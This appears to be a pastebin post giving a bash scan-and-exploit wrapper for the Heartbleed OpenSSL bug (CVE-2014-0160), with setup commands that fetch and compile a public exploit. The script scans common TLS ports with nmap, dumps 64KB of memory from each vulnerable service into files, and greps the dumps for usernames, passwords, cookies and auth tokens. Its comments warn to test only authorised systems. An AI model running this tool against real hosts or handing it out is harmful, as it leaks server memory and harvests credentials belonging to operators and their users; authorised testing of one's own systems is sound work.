SCAN + EXPLOIT Heartbleed OpenSSL 1.0.1

Googleinurl May 6th, 2014 1,690 Never
  1. # Heartbleed
  2.  
# Affected OpenSSL versions (the Heartbleed bug, CVE-2014-0160)
#
# The affected versions of OpenSSL are 1.0.1 through 1.0.1f (inclusive).
# Later versions (1.0.1g and newer) and earlier branches (1.0.0 and older) are not vulnerable.
# Installations of the affected versions are vulnerable unless OpenSSL was compiled with OPENSSL_NO_HEARTBEATS.
  8.  
# Scan and exploit
#
# ./hbse 127.0.0.1           # Interactive mode: prompts before exploiting, viewing and deleting dumps.
# ./hbse --scan 127.0.0.1    # Non-interactive: scan only.
# ./hbse --exploit 127.0.0.1 # Non-interactive: scan, then dump memory from every vulnerable port
#                            # into files named <ip>.<port> in the current directory (kept afterwards).
  15.  
  16.  
# Requirements
#
# apt-get install nmap
# wget --no-check-certificate https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
# mv ssl-heartbleed.nse /usr/share/nmap/scripts/.
# wget http://nmap.org/svn/nselib/tls.lua
# mv tls.lua /usr/share/nmap/nselib/.
# wget -O heartbleed.c http://www.exploit-db.com/download/32791
# gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto
#
# NOTE: the NSE script above is fetched with certificate verification disabled, and
# tls.lua and heartbleed.c over plain HTTP; they are then installed system-wide or
# compiled and executed. Drop --no-check-certificate (or fix the CA bundle) where
# possible, and review or checksum each download before installing or building it.
# Use the tool only against systems you are authorised to test: each exploit run
# reads 64KB of the target process's memory.
  26.  
  27. # SCRIPT
  28.  
  29. # cat hbse
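#!/bin/bash
#
# hbse - Heartbleed (CVE-2014-0160) scan-and-exploit wrapper.
#
# Scans a host with nmap's ssl-heartbleed NSE script and, on request, runs the
# compiled ./heartbleed binary against every vulnerable port, saving each 64KB
# memory dump as <ip>.<port> in the current directory.
#
# Usage:
#   ./hbse <ip>              interactive: asks before exploiting, viewing, deleting
#   ./hbse --scan <ip>       scan only, no prompts
#   ./hbse --exploit <ip>    scan and exploit, no prompts (dump files are kept)
#
# Globals set here and read by the rest of the script:
#   se      mode flag: "--scan", "--exploit", or empty for interactive mode
#   ip      target host (passed straight to nmap and ./heartbleed)
#   nports  nmap port specification covering the TLS-wrapped services below
#
# Only run this against hosts you are authorised to test: the exploit leaks
# process memory from the target.

### TCP ####

# 443  (HTTPS - HTTP over SSL)
# 465  (SMTPS - SMTP over SSL)
# 563  (NNTPS - NNTP over TLS/SSL)
# 636  (LDAPS - LDAP over TLS/SSL)
# 989  (FTPS Data - FTP Data over TLS/SSL)
# 990  (FTPS Control - FTP Control over TLS/SSL)
# 992  (Telnet over TLS/SSL)
# 993  (IMAPS - IMAP over SSL)
# 995  (POP3S - POP3 over SSL)
# 1194 (OpenVPN)
# 2484 (Oracle Database listening for SSL client)
# 5061 (SIP over TLS)
# 8443 (Apache Tomcat SSL)

### UDP ###

# 563  (NNTPS - NNTP over TLS/SSL)
# 636  (LDAPS - LDAP over TLS/SSL)
# 4433 (OpenSSL)

# Argument handling. Misuse used to exit silently with status 0; it now prints
# a usage line to stderr and exits 2 so a caller can tell it from a clean run.
# A second argument must be one of the two recognised mode flags (a mistyped
# flag used to fall through to interactive mode).
usage() {
    printf 'Usage: %s [--scan|--exploit] <ip>\n' "${0##*/}" >&2
    exit 2
}

if [ $# -eq 1 ]; then
    se=""
    ip="$1"
elif [ $# -eq 2 ]; then
    se="$1"
    ip="$2"
    case "$se" in
        --scan|--exploit) ;;
        *) usage ;;
    esac
else
    usage
fi
[ -n "$ip" ] || usage

# Port spec for the "other ports" sweep (443 is probed first on its own).
nports="T:443,465,563,636,989,990,992,993,995,1194,2484,5061,8443,U:563,636,4433"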
  63.  
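# print TEXT COLOR
#
# Write TEXT to stdout wrapped in an ANSI colour escape, with no trailing
# newline. Backslash escapes in TEXT are interpreted (callers pass a literal
# "\n" to end a line). COLOR is one of gray, red, green or yellow; any other
# value prints TEXT uncoloured.
#
# Fixes over the original: variables are local and the colour prefix defaults
# to empty, so a stale colour from an earlier call can no longer leak into a
# call with an unknown colour name; the text is passed quoted, so multi-line
# values (the nmap port list, `strings` output) keep their newlines and are not
# glob-expanded by the shell.
print() {
    local text="$1"
    local color="$2"
    local prefix=""
    local reset="\e[0m"
    case "$color" in
        gray)   prefix="\e[38;5;250m" ;;
        red)    prefix="\e[91m" ;;
        green)  prefix="\e[92m" ;;
        yellow) prefix="\e[93m" ;;
    esac
    # %b expands backslash escapes like `echo -e` did, without word-splitting.
    printf '%b' "${prefix}${text}${reset}"
}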
  79.  
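# --- main --------------------------------------------------------------------
# Stage 1: probe port 443 on its own. Only if it is vulnerable do we sweep the
# rest of $nports and then, interactively or under --exploit, dump memory from
# each vulnerable port. Note that "No" only means nmap printed no VULNERABLE
# line: a filtered/closed port or an nmap failure gives the same answer, so
# confirm reachability before trusting a negative result.
print "Checking if $ip is vulnerable on port 443... " "gray"
vulnerable="$(nmap -p T:443 --script ssl-heartbleed "$ip" | grep VULNERABLE)"

if [ -n "$vulnerable" ]; then
    print "Yes\n" "green"
    print "Checking if it is vulnerable on other ports... " "gray"
    # nmap prints "<port>/<proto> open <service>" two lines above "VULNERABLE:";
    # keep only the port number, one per line.
    vports="$(nmap -p "$nports" --script ssl-heartbleed "$ip" \
        | grep -B 2 VULNERABLE: | grep open | awk -F'/' '{print $1}')"
    # The sweep should at least re-find 443; if it came back empty (transient
    # error, rate limiting) fall back to the port already confirmed above rather
    # than handing an empty port to ./heartbleed.
    [ -n "$vports" ] || vports="443"
    # Count non-empty lines. The original counted the unset $ports instead of
    # $vports, so it always saw exactly one port and always answered "No" here.
    n="$(printf '%s\n' "$vports" | grep -c .)"
    if [ "$n" -le 1 ]; then
        print "No\n" "red"
        w1="port"
        w2="it"
        w3="file"
    else
        print "Yes\n" "green"
        w1="ports"
        w2="them"
        w3="files"
    fi
    print "Vulnerable $w1:\n" "gray"
    print "$vports\n" "green"
    if [ "$se" == "--scan" ]; then
        exit 0
    elif [ "$se" == "--exploit" ]; then
        answer="Y"
    else
        print "Do you want to exploit $w2? [Yn] " "gray"
        read -r answer
    fi
    if [ "$answer" = "Y" ] || [ "$answer" = "y" ]; then
        print "Exploit: dumping 64KB on vulnerable $w1...\n" "gray"
        # The port list is read from fd 3 so that the prompts inside the loop
        # can still read the operator's answers from stdin.
        exec 3<<< "$vports"
        while read -r port <&3; do
            [ -n "$port" ] || continue
            print "+ Port [$port]\n" "gray"
            ofile="$ip.$port"
            rm -f -- "$ofile"
            # Per-port extra options for heartbleed.c, kept from the original.
            # The -c value presumably selects the pre-TLS (STARTTLS-style)
            # dialogue for that service -- confirm against heartbleed.c's usage.
            precmd=()
            case "$port" in
                465) precmd=(-c 0) ;;
                993) precmd=(-c 2) ;;
                995) precmd=(-c 1) ;;
            esac
            ./heartbleed -s "$ip" -p "$port" -f "$ofile" "${precmd[@]}" -t 1 > /dev/null 2>&1
            if [ -f "$ofile" ]; then
                # Triage: grep the dump for credential-looking strings. The file
                # holds raw memory from the target -- treat it as sensitive data.
                r="$(strings "$ofile" | grep -i -e user -e pass -e login -e auth -e cookie -e basic)"
                print "$r\n" "green"
                if [ "$se" != "--exploit" ]; then
                    print "Do you want to less the hexdump file? [Yn] " "gray"
                    read -r answer
                    if [ "$answer" = "Y" ] || [ "$answer" = "y" ]; then
                        hexdump -C "$ofile" | less
                    fi
                fi
            else
                # The script assumes ./heartbleed only creates the -f file on a
                # successful heartbeat exchange; no file means it failed here.
                print "Error: heartbleed did not work on port $port...\n" "yellow"
            fi
        done
        exec 3<&-
        if [ "$se" != "--exploit" ]; then
            print "Do you want to delete the hexdump $w3? [Yn] " "gray"
            read -r answer
            if [ "$answer" = "Y" ] || [ "$answer" = "y" ]; then
                rm -f -- "$ip".*
            fi
        fi
    fi
else
    print "No\n" "red"
fi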